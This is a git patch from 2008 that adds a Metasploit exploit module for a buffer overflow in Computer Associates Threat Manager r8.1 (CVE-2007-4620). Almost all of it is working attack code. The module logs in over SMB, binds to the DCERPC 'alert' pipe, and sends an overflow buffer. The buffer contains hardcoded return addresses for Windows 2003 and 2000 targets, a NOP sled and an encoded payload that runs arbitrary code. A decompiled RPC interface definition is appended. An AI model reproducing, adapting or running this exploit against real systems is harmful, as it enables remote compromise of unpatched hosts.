From c1555ac4498e9dd26160da131da2237928e3ad43 Mon Sep 17 00:00:00 2001 From: Mario Ceballos Date: Sat, 12 Apr 2008 02:26:41 +0000 Subject: [PATCH] added exploit module etrust_itm_alert.rb git-svn-id: file:///home/svn/framework3/trunk@5472 4d416f70-5f16-0410-b530-b9f4589650da --- .../windows/brightstor/etrust_itm_alert.rb | 132 ++++++++++++++++++ 1 file changed, 132 insertions(+) create mode 100644 modules/exploits/windows/brightstor/etrust_itm_alert.rb diff --git a/modules/exploits/windows/brightstor/etrust_itm_alert.rb b/modules/exploits/windows/brightstor/etrust_itm_alert.rb new file mode 100644 index 0000000000..e761c775b2 --- /dev/null +++ b/modules/exploits/windows/brightstor/etrust_itm_alert.rb @@ -0,0 +1,132 @@ +## +# $Id: etrust_itm_alert.rb +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + + +require 'msf/core' + +module Msf + +class Exploits::Windows::Brightstor::Etrust_ITM_Alert < Msf::Exploit::Remote + + include Exploit::Remote::DCERPC + include Exploit::Remote::SMB + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Computer Associates Alert Notification Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1 + By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code. + In order to successfully exploit this vulnerability, you will need valid logon credentials to the target. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'CVE', '2007-4620' ], + [ 'BID', '28605' ], + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 550, + 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", + 'StackAdjustment' => -3500, + 'PrepenEncoder' => "\x81\xc4\x54\xf2\xff\xff", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows 2003 SP0 English', { 'Ret' => 0x77e03efb } ], + [ 'Windows 2000 SP4 English', { 'Ret' => 0x7c30d043 } ], + ], + 'DisclosureDate' => 'Apr 4 2008', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('SMBPIPE', [ true, "The pipe name to use (alert)", 'alert']), + ], self.class) + + end + + def exploit + connect() + smb_login() + + handle = dcerpc_handle('3d742890-397c-11cf-9bf1-00805f88cb72', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]) + print_status("Binding to #{handle} ...") + + dcerpc_bind(handle) + print_status("Bound to #{handle} ...") + + filler = rand_text_english(979) + [target.ret].pack('V') + make_nops(12) + payload.encoded + + sploit = NDR.string(rand_text_english(rand(1024) + 1) + "\x00") + NDR.string(filler + "\x00") + sploit << NDR.string(rand_text_english(rand(1024) + 1) + "\x00") + NDR.long(0) + + print_status("Trying target #{target.name}...") + + begin + dcerpc_call(0x00, sploit) + rescue Rex::Proto::DCERPC::Exceptions::NoResponse + end + + handler + disconnect + end + +end +end +=begin +/* + * IDL code generated by mIDA v1.0.8 + * Copyright (C) 2006, Tenable Network Security + * http://cgi.tenablesecurity.com/tenable/mida.php + * + * + * Decompilation information: + * RPC stub type: inline + */ + +[ + uuid(3d742890-397c-11cf-9bf1-00805f88cb72), + version(1.0) +] + +interface mIDA_interface +{ + +typedef struct struct_1 { + long elem_1; + [size_is(10000), length_is(elem_1)] struct struct_2 * elem_2; +} struct_1 ; + +typedef struct struct_2 { + char elem_1[52]; +} struct_2 ; + + +/* opcode: 0x00, address: 0x00401000 */ + +long sub_401000 ( + [in][ref][string] char * arg_1, + [out][ref] struct struct_1 * arg_2, + [in][ref][string] char * arg_3 +); + +} +=end